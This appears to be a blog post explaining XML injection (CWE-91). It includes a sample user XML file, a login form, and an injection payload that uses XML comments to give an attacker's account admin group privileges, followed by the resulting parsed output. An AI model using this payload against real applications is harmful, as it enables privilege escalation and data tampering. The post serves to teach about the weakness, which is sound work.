XML Injection [CWE-91] — The Hacktivists

1. Description
………………………………

A variety of popular software (Apache Tomcat, OpenOffice, Microsoft Office, IM Jabber, Zend Framework, IBM WebSphere) uses eXtensible Markup Language (XML) to communicate with back-end servers, authenticate users, store information, etc. The XML data structure is used in plenty of protocols, such as XML-RPC, SOAP, Jabber, WDDX, and XMI.

<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>admin</username>
<password>VeryStrongP@ssw0rd</password>
<userid>1</userid>
<groupid>1</groupid>
<email>admin@mysite.com</email>
</user>
<user>
<username>user</username>
<password>weakpass</password>
<userid>500</userid>
<groupid>10</groupid>
<email>user@mysite.com</email>
</user>
</users>
<form name="frm" method="post" action="">
<p>Username: <input type="text" name="login"></p>
<p>Password: <input type="password" name="passwd"></p>
<p>Email: <input type="text" name="login"></p>
<p><input type="submit" value="Log In" name="btLogin"></p>
</form>
Username: attacker
Password: password</password><!--
E-mail: --><userid>10000</userid><groupid>1</groupid><mail>attacker@attacker.com
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>admin</username>
<password>VeryStrongP@ssw0rd</password>
<userid>1</userid>
<groupid>1</groupid>
<mail>admin@mysite.com</mail>
</user>
<user>
<username>user</username>
<password>weakpass</password>
<userid>500</userid>
<groupid>10</groupid>
<mail>user@mysite.com</mail>
</user>
<user>
<username>attacker</username>
<password>password</password> <!--
<userid>500</userid>
<groupid>10</groupid>
<mail>--><userid>10000</userid><groupid>1</groupid><mail>attacker@attacker.com</mail>
</user>
</users>
SimpleXMLElement Object
(
[user] => Array
(
[0] => SimpleXMLElement Object
(
[username] => admin
[password] => VeryStrongP@ssw0rd
[userid] => 1
[groupid] => 1
[mail] => admin@mysite.com
)

[1] => SimpleXMLElement Object
(
[username] => user
[password] => weakpass
[userid] => 500
[groupid] => 10
[mail] => user@mysite.com
)

[2] => SimpleXMLElement Object
(
[username] => attacker
[password] => password
[comment] => SimpleXMLElement Object
(
)

[userid] => 10000
[groupid] => 1
[mail] => attacker@attacker.com
)
)

)

2. Potential impact
………………………………

As for any code injection, the potential impact depends on the vulnerable application and its functionality. An attacker might be able to gain access to potentially sensitive information, modify or delete data and elevate privileges within the application. XML Injection can be used in XXE attacks to gain access to internal networks, gather sensitive information, perform port scans, etc. In a worst-case scenario, this weakness could result in a full system compromise.

3. Attack patterns
………………………………

According to CAPEC, there are the following attack patterns for this weakness:

4. Affected software
………………………………

Extensible Markup Language is integrated into a variety of client/server applications and protocols. Software that uses XML-based protocols might be potentially vulnerable to this weakness.

5. Severity and CVSS Scoring
………………………………

XML injection weaknesses can influence confidentiality, integrity, and availability of the application. Depending on the application’s functionality, an attacker might be able to read, modify, delete information stored in XML files or even elevate privileges within the application.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store